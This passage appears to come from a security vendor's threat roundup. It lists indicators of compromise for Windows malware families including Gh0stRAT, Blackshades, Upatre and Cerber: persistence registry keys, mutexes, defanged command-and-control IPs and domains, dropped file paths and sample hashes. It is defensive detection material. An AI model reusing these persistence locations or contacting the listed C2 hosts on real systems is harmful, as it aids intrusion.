COMPONENTS\\{5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13} ` | 6 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13} \nValue Name: StubPath ` | 6 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{766867P2-2ICN-NQ0P-3VWT-3XW6E42YHP48} \nValue Name: StubPath ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{766867P2-2ICN-NQ0P-3VWT-3XW6E42YHP48} ` | 5 \n`<HKCU>\\SOFTWARE\\<random, matching '[a-zA-Z0-9]{5,9}'> \nValue Name: ServerStarted ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{5460C4DF-B266-909E-CB58-E32B79832EB2} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{K66YL0K3-XDEE-5AWY-0K06-EI7W1R701BL3} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{K66YL0K3-XDEE-5AWY-0K06-EI7W1R701BL3} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{V1V7S53C-K2F0-6KCB-18UG-1IS4RLL44I6B} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{V1V7S53C-K2F0-6KCB-18UG-1IS4RLL44I6B} \nValue Name: StubPath ` | 1 \n`<HKCU>\\SOFTWARE\\ASDAF2DS3F ` | 1 \n`<HKCU>\\SOFTWARE\\ASDAF2DS3F \nValue Name: ServerStarted ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{5460C4DF-B266-909E-CB58-E32B79832EB2} \nValue Name: StubPath ` | 1 \n`<HKCU>\\SOFTWARE\\ASDAF2DS3F \nValue Name: InstalledServer ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{6U3FL100-6U8B-5472-CPGO-7O4P7G8N8UO7} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{6U3FL100-6U8B-5472-CPGO-7O4P7G8N8UO7} ` | 1 \nMutexes | Occurrences \n---|--- \n`XTREMEUPDATE` | 15 \n`2H8xgwYEXIT` | 9 \n`1nGM3R2HW` | 6 \n`1nGM3R2HWPERSIST` | 6 \n`\\BaseNamedObjects\\SHuJ5a0JNEXIT` | 5 \n`\\BaseNamedObjects\\SHuJ5a0JNPERSIST` | 5 \n`\\BaseNamedObjects\\SHuJ5a0JN` | 5 \n`2H8xgwYPERSIST` | 3 \n`2H8xgwY` | 3 \n`asdaf2ds3f` | 1 \n`asdaf2ds3fPERSIST` | 1 \n`asdaf2ds3fEXIT` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`192[.]169[.]69[.]25` | 11 \n`186[.]80[.]214[.]75` | 1 \n`181[.]136[.]96[.]20` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`lili3030[.]duckdns[.]org` | 6 \n`thork13[.]duckdns[.]org` | 4 \n`explocion[.]ddns[.]net` | 1 \n`toyota[.]duckdns[.]org` | 1 \n`master254781[.]ddns[.]net` | 1 \n`TAVO11[.]DDNS[.]NET` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\iJune22.exe` | 15 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iJune22.lnk` | 15 \n`\\~WELK\\TLO.dll` | 10 \n`\\~WELK` | 10 \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\iJune22.lnk` | 8 \n`%APPDATA%\\Microsoft\\Windows\\1nGM3R2HW.dat` | 6 \n`%APPDATA%\\Microsoft\\Windows\\1nGM3R2HW.cfg` | 6 \n`%SystemRoot%\\Hewlett` | 6 \n`%SystemRoot%\\Hewlett\\world.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\SHuJ5a0JN.cfg` | 5 \n`%APPDATA%\\Microsoft\\Windows\\SHuJ5a0JN.dat` | 5 \n`%SystemRoot%\\chrome\\google.exe` | 5 \n`\\~GGFD` | 5 \n`\\~GGFD\\VDF.dll` | 5 \n`%SystemRoot%\\chrome` | 5 \n`%TEMP%\\x.html` | 4 \n`%SystemRoot%\\InstallDir` | 3 \n`%APPDATA%\\Microsoft\\Windows\\<random, matching '[a-zA-Z0-9]{5,9}'>.dat` | 3 \n`%APPDATA%\\Microsoft\\Windows\\<random, matching '[a-zA-Z0-9]{5,9}'>.cfg` | 3 \n`%SystemRoot%\\InstallDir\\Server.exe` | 2 \n`%APPDATA%\\Microsoft\\Windows\\SHuJ5a0JN.xtr` | 1 \n`%SystemRoot%\\SysWOW64\\System32` | 1 \n`%SystemRoot%\\SysWOW64\\System32\\DELL1.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\asdaf2ds3f.dat` | 1 \n`%APPDATA%\\Microsoft\\Windows\\asdaf2ds3f.cfg` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 21580ad6d39d4f863d8022706812586ef748d179974f3de5b3bae954192ac085 3885550e90bdbf469e3de0ed314b0bae355e5b531e63ebc2766100899de7e4f6 5364296fb8c7f23a30f12abaafdab87659050ae699d8eea17eca90b148959d21 593c32f771db8970231f0543e4b58bc978bbba4e2e6a0285303017040217c250 66a92f7dc4f6ad067ea257be7ceea59e89e5e5b7fccfe1808bb97db7e07741b4 6ff17284e9016804b80fe69d1f6efede80c398ac29986659fb11f5cc313b784c 7408cda78e127d3d8a7ba8b94b3b062a4a2e0e144fd15422c194dba4a2588ec2 7bf298822f352c0324495373ab984eaecb12f72277988c146496ce19e7e787ba 88fbd4fe4e2aa94375a7cd18305ef0f57722a5e83a468122e847711ebef1b4f1 a75930eb9955724aac62046b3fdff1d4b0c9ce834279915e18b44e2d290e7bde a90db1ec3e45cc03acbb2ee990ff8bd3815cb1c1ccb1ebb6ade227d4493a1d10 b3d349857cf2aa51d4781e02c414f8f34de52cd123b692b49303aaf1e9488822 dfb4eb5f09a31230bdfe457b3fd427b591b6700b62d0036a1d2380db9f464a92 ec1a87dde0b88b9a390439a57830e13063292378abc5c7c21c4fcd3e8054df28 f9cac38fde30e5c07840ec2fe6ca351d2e5f4da5fe4c8ddebd5bab3a51b83902 ff3902531d9310ea6c38cab19b575a88bcd44d9083430789f4cba4c79979193d `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/--bDL4K8gWZ4/XYTwltfYMJI/AAAAAAAACp8/iSLByC-Fd9AeM5Y90j-xEDJxh_mHD34twCLcBGAsYHQ/s1600/6ff17284e9016804b80fe69d1f6efede80c398ac29986659fb11f5cc313b784c_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-mOREF38LDNA/XYTws61lpLI/AAAAAAAACqA/JYBaZF2owDo8I_hwzQiLPu1iva0yxS6bQCLcBGAsYHQ/s1600/6ff17284e9016804b80fe69d1f6efede80c398ac29986659fb11f5cc313b784c_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-Y2cn4J8uhBY/XYTwzF0_83I/AAAAAAAACqE/D3ZtQ6E7CgsGD88tsugTTSdamg4zqx4vQCLcBGAsYHQ/s1600/3885550e90bdbf469e3de0ed314b0bae355e5b531e63ebc2766100899de7e4f6_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Downloader.Upatre-7170342-1\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]18[.]62[.]192` | 19 \n`104[.]18[.]63[.]192` | 9 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`mmile[.]com` | 28 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\hfdfjdk.exe` | 28 \n`%TEMP%\\ckjienn.exe` | 28 \n`%TEMP%\\file.pe32` | 6 \n`%HOMEPATH%\\Downloads\\invoice.exe` | 4 \n \n#### File Hashes\n\n` 053be505a2b2522fad8b7cb71f5bd04968cfb3ad5e77ad50eac80c71b9ad646d 06de4bdfc758de6336022f8301d692dcc17acbfc9663b367df86a02d528f2b90 09af6f559bcb42c006c0efc09f52dd592f459786c39780679d9d779998b6ecfd 0d2d5ff847cb20067e4213d78dcdf7aaa1c62546dcb00137b087d81703abddcc 21cc6498a5a9cecd5d0c3e94bddd4b182b8db1109268f7be061205fbdb91dfaf 2c1376de5d487cb0ea7be8b0f2710e3b205402bb78f20107a89711f8772120ac 3680339a0a4a8c411134b56dd25beb82b86e49e344d569beadd731d4e76d9cb5 3b24eaa42329d6abf6ce19c41738062797a2515122254b527fd5aec792723db6 3d16bedb9905e2ea113ccf8867502bb1b24d712234ef5a54257b8b3206e27479 43537dfd0609351d2e8d2e858aace8b0fb9ba89d301017a233fbd407f2ad39bd 455bf07f30cce22c8e45801258ea6ca480daed4537f50b2260bb372e784d6eaa 5458977721ca062b9d061190c01da20afc30e616b8264a9e88ef394039c476ed 5d4531531c698fa163199ee68a34661a212b69a93f43eff6d510e85f8663755c 6687eac3a15cb4e0e070ea5a72888644bfe05093e1e30a49b4e0a2a5a29d3d63 67b6cef58b9a052e1ae7994c930014a2ab045c3c7d856896747ceb3bff454c10 6fe8a7c6f231c9c8508879c983583810ea137d022b2d5b17b0213609f8a2f3e0 74f31384ed882520d99460a4583074e2269d3546f30fd08500a671e47f71519b 84e3298502bfa5ddfddc71f014eef7796ad4d1e11b5e40c52a65d3ac04771197 867bb45649adc9f5952e8944c0a4a2f256ed0875f52bd431212f5ade82d240f3 95ab1ac088f7be7dd71ecb6ea5c5923f4adbb05bd9480623ec788d6688ebae71 95cb3bbabe9d01355f0363f341b1a8d0d56b485e2b62c1111a0f68839c7d9c2e a0a861ff5549335dc76f9fd837e20073e23a2298b7e025615dfdbf0e00b0a91d a551656a575421e4cb87a7598846ab9436fb0bc7d9c7869edc8a4ca5d65ec105 b1aa0afb11da754c88e496a081982394a1ff8e6be6de0e54a11e27681095f8b1 beb20991985d1f3ea8654fdfb1e45824eed71a0abdff34ee1e3963a140a606ed `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-uu2HCdCO4M0/XYTxEgozvZI/AAAAAAAACqQ/ioAvNaMPKScjOEvLvVVR0rnCiiXmue82gCLcBGAsYHQ/s1600/5458977721ca062b9d061190c01da20afc30e616b8264a9e88ef394039c476ed_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IIqGLLoGoGw/XYTxJgNaktI/AAAAAAAACqU/PwQ4Q9FagDYJgxktXedgf1HwF_Oymxm-gCLcBGAsYHQ/s1600/5458977721ca062b9d061190c01da20afc30e616b8264a9e88ef394039c476ed_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Gh0stRAT-7170222-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Update_win ` | 29 \nMutexes | Occurrences \n---|--- \n`sanshuigood.vicp.cc` | 3 \n`222.186.56.11` | 3 \n`rj.17caobi.com` | 2 \n`23.238.196.11` | 2 \n`222.186.34.200` | 1 \n`\\BaseNamedObjects\\103.249.28.41` | 1 \n`\\BaseNamedObjects\\174.139.211.14` | 1 \n`\\BaseNamedObjects\\174.139.208.54` | 1 \n`59.13.211.161` | 1 \n`67.229.57.228` | 1 \n`27.255.80.206` | 1 \n`220.70.90.33` | 1 \n`rj.dxjav.com` | 1 \n`117.52.14.152` | 1 \n`67.198.139.206` | 1 \n`67.229.224.82` | 1 \n`121.78.158.39` | 1 \n`loloyasumi.com` | 1 \n`100.43.130.130` | 1 \n`98.126.240.114` | 1 \n`184.83.6.205` | 1 \n`174.139.208.51` | 1 \n`183.86.218.138` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`61[.]142[.]176[.]23` | 3 \n`222[.]186[.]56[.]11` | 3 \n`23[.]238[.]196[.]11` | 2 \n`216[.]218[.]206[.]69` | 1 \n`222[.]186[.]34[.]200` | 1 \n`103[.]249[.]28[.]41` | 1 \n`174[.]139[.]211[.]14` | 1 \n`174[.]139[.]208[.]54` | 1 \n`59[.]13[.]211[.]161` | 1 \n`67[.]229[.]57[.]228` | 1 \n`27[.]255[.]80[.]206` | 1 \n`220[.]70[.]90[.]33` | 1 \n`117[.]52[.]14[.]152` | 1 \n`67[.]198[.]139[.]206` | 1 \n`67[.]229[.]224[.]82` | 1 \n`121[.]78[.]158[.]39` | 1 \n`100[.]43[.]130[.]130` | 1 \n`98[.]126[.]240[.]114` | 1 \n`184[.]83[.]6[.]205` | 1 \n`174[.]139[.]208[.]51` | 1 \n`183[.]86[.]218[.]138` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`sanshuigood[.]vicp[.]cc` | 3 \n`rj[.]17caobi[.]com` | 2 \n`rj[.]dxjav[.]com` | 1 \n`loloyasumi[.]com` | 1 \n \n#### File Hashes\n\n` 0235f44dcc192d4a9388c9a209a8e28197be43afe382cd089b2445f15c4bfc7b 03e1d03b7ecc4dc2a4f781b83fb1d0677e885b995b96da937789ba594dfa6ba6 098522455fe96579b43408f37111f6064e2b564ff69e94f9808e01722e868c00 0b4a4f248629b27f3929e4a11186c35448c86921bd913dd5847a2c60ce430985 0f165051f607a0f289a8d9af17dec51cc9074134b70a766ae98293d08c8ae230 10609c1a910e9e71107cde6a3dc6f6ebcda7c2cb2a5775fe4e0217953f87c690 1d7dfe543d4ca35cfb162bf01e452c31240db8caa4452bb0fe5d382e730817d4 24bd88c9de5d9d09dc42a6b7338deb060c8444c1b57918a32d43739fa255247b 24fda94cdc7eb56af6fb5e6c39a85d9f80a1d622c4e3e5627bf30445b6b3a603 28bfbe60ce5013709c6e66d2aa96391dd260bdc3d6d7aa4dcd947ac79351a9e0 28c1255d7261e13d6a0f380267d43e190b1c54da127667591cda45844266265e 33d1367a9864cd8704db52626a5ff24d84ac74efd1414c371516b49a2bf73cb3 382ab955b1af78fba82e1209e6d61328d3100cb65f13be24615630dddf55af1a 383fed33d04f113938f2c21df9c7387e616ad4b528cb8d4dd6d0f8192ace729d 384583ac629ffbcb7a55da44910dd23cd380ce788bfae201c7ede3189959619f 38857b2a7f68193292de188f5ae07a1dc20cc8d9616a8fcfc8d7e56c9cb1342b 39027866667d05c74a96c42d98cd08b90a8f78dcfd88d3f28265a2dc5f1d1b7c 3b93d4215f033ae31063f5a790d6a139925a0e3a15f9e5ff32bf85b852eebcca 3c7c883d9cbfe7f0dc2a600e845becde9bf87898651ae475654fd79d37df5589 4bb16a15be32eb06a514619e851cca7a89b0e990c678192cd0a6329ac04dab5d 4c30fef1e3bb90050f8c874b92857e223179214a3c2e566da2c44dbf8b500d90 4c322440da73cf7b1152f3d62729cb4d8c2d8cefe8403743ca53283c33955689 51557a7629fe983488ac73c79717b97223c0babd9319916c3fbd575400eb09f0 51ae9265a88cf455a3143c022eea1e41038d3617f964ebf3f58310a9dfbacc33 68a9bf919b38f938938062e22852a3adebcca10973db9eb8172ee0e40e80fa34 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-XB808TFUCo4/XYTxdGHunmI/AAAAAAAACqg/bFZODEhFp28n93OJEN0uIowt6p8UjvArgCLcBGAsYHQ/s1600/3c7c883d9cbfe7f0dc2a600e845becde9bf87898651ae475654fd79d37df5589_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-0peo5b84HgU/XYTyCZLWY-I/AAAAAAAACqs/lZfErrKvPm87JyCvaLSgU-Jd1tZ8LmdxgCLcBGAsYHQ/s1600/03e1d03b7ecc4dc2a4f781b83fb1d0677e885b995b96da937789ba594dfa6ba6_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-Jw3Mrmiw4ys/XYTyI8tjTjI/AAAAAAAACqw/XBNHXHTUkUkqeRpe1b6bVdv0CIcYMESkACLcBGAsYHQ/s1600/384583ac629ffbcb7a55da44910dd23cd380ce788bfae201c7ede3189959619f_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Blackshades-7168564-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DoNotAllowExceptions ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\INSTALL ` | 67 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS ` | 67 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\SRVID ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\SRVID\\ID ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\INSTALL\\DATE ` | 67 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: Microsoft/HKCU ` | 67 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft/HKCU ` | 67 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft/HKCU ` | 67 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} \nValue Name: StubPath ` | 67 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} \nValue Name: StubPath ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\SRVID\\ID \nValue Name: 5FHDOAPLOK ` | 67 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\Users\\Administrator\\AppData\\Roaming\\Adobe.exe ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\INSTALL\\DATE \nValue Name: 5FHDOAPLOK ` | 67 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} ` | 66 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} ` | 65 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS \nValue Name: StubPath ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS \nValue Name: StubPath ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\TEMP\\1a461072aa3e19bc429aa83c49ea31c7722213865cf50a6937b62776a54d8a7b.exe ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\TEMP\\0cf04b4b65e7726e9d7d54f88299c4f1bbcad8aed4b586477c1bd7a48d21f318.exe ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\TEMP\\1c5fa3c699edc2528a14eb7763db3064fdf8ea90e6d35c5bba8f82f786d995d5.exe ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\TEMP\\3954af7bdbe570ff5c6fc1b7776b387a8b3a3d3bb57b0e187a9f4829b51c51cd.exe ` | 1 \nMutexes | Occurrences \n---|--- \n`5FHDOAPLOK` | 67 \n`\\BaseNamedObjects\\5FHDOAPLOK_pers` | 35 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`212[.]117[.]50[.]228` | 67 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`c2upfront[.]no-ip[.]info` | 67 \n`3c2upfront[.]no-ip[.]info` | 67 \n`2c2upfront[.]no-ip[.]info` | 67 \n`1c2upfront[.]no-ip[.]info` | 67 \n`5c2upfront[.]no-ip[.]info` | 36 \n`7c2upfront[.]no-ip[.]info` | 36 \n`4c2upfront[.]no-ip[.]info` | 36 \n`6c2upfront[.]no-ip[.]info` | 36 \nFiles and or directories created | Occurrences \n---|--- \n`\\Autorun.ini` | 67 \n`E:\\Autorun.ini` | 67 \n`%APPDATA%\\Adobe.exe` | 67 \n`%TEMP%\\vbc.exe` | 67 \n`%APPDATA%\\Player` | 67 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1568.3292588968` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1568.3299479095` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1184.3299487707` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1568.3299490359` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.948.3299488440` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1704.3299497847` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1704.3299497597` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1184.3299507550` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1704.3299506988` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1704.3299506754` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1568.3299515631` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1976.3299515428` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1568.3299525552` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.744.3299525693` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1704.3299535739` | 1 \n \n#### File Hashes\n\n` 0061fdd7beb58e2d98dd6425c4467fabf84ee3261deed1ee41b3f09db77a3003 0103e022c0a56da31a998dab5f276be4bfa77e4b45e19d7e274e3ebfc6011794 020b795dc30a29af90cdf3d90213c74a9c1b18842077f48dc1cc824eefe52938 0435e4e9698ecdb041f392ee1e46204c64fa79151b028b9b3a938914a6348f7a 0444890807a5e1d7118896a2de574dd6ed48a0739ce371530ee15181336fe8ac 0581cf5e05f6f3a2148a8182cc6c753397d86eca85515c746a039a043c0156d3 0685f82e2301864e164b8ef4fb8e1f8a01540b3a87e5ca2b632be9b080446b9b 0835583f69abb28340d430ecc408e423c424a24a72a3a58e94a674e8a6880359 08c924b472ee439d357a811a209dac18bd337f5525d44c4a988158b51fb09feb 09898e7c85ce10d9f9e1d02c839b7b1b2c1a95826857854728b59548d0ea12f9 09a2f347ea8ca01153a1f53f668efcea8a85d98789abe0f4aebbbe83c72aed8c 09d34805c6ef60df465377aa7303c3edd19616aa3feba7051d8142f7020fc475 09d87c515a293798b1422625098e5a150c95e9a77e9b4f0207a9d3403fba1978 0a15b2293f794209b5190b12606d59fad342aa183d6a88aa841a70959cd5baf6 0bf4cdc4b180c5c4ceca11cb86be76a19a125ef097b94775a7f7c6b93d0d422f 0bf65a3c05256cb7fa901cfba4382f43032768c664dfab225ef504eda8b2667e 0c09b71359ae1c7358707eda957ae9e821d25e9c54ee9fba0d98a6cf22dcc77d 0c0e8ae82bff3013c7078798f6a9385262f42b27cdf6b89fe86e99aaaf49bd78 0c16e1bc2eece1ba2c3f590f7ea6a3cd32ae0cea789c6a2a066e85659b969107 0cb8b3dec2d52544e2adaf0e8be5765defaf8196fa93066d05f2e9db3ba0df5a 0cf04b4b65e7726e9d7d54f88299c4f1bbcad8aed4b586477c1bd7a48d21f318 0df2f3957a2a7793193ebcac0bd50db52c87f1062d41cb223dd621bbbe91362b 0f7d9402bc26786b576b5fdb6b60904f509bc643edd70ef3278652b7a716591d 0fbd9df4815f16405436ac36d5fe99ac0ae847cf3c0588534cd07d58bb918729 0fbe434942613ae5c6ea47d8abe73c86e898c6af97d89e802bb3ba5e5efc6647 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-vYwKemIIgUY/XYTyZtMCW2I/AAAAAAAACq8/LkVtFOW2GKYByPxQ1PoF3flkL0PdaFIaACLcBGAsYHQ/s1600/0a15b2293f794209b5190b12606d59fad342aa183d6a88aa841a70959cd5baf6_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-jaUENMbSBJ4/XYTyewazSYI/AAAAAAAACrA/LfeSt82_ehEc54Eu-pH9_zJc2pT7U2KkQCLcBGAsYHQ/s1600/e10c0c27a812ee6dc5a28e575999eddbe7d120110cb8694a92de7c56372e8b1a_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7168312-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 116 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 116 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 116 \n`\\BaseNamedObjects\\shell.{CA0E5370-75D1-0D8C-179E-782353EA1E4D}` | 16 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`178[.]33[.]163[.]254` | 116 \n`178[.]33[.]162[.]254` | 116 \n`178[.]33[.]160[.]254` | 116 \n`178[.]33[.]161[.]254` | 116 \n`178[.]33[.]160[.]224` | 116 \n`178[.]33[.]160[.]240` | 116 \n`178[.]33[.]162[.]192` | 116 \n`178[.]33[.]158[.]0` | 116 \n`178[.]33[.]159[.]0` | 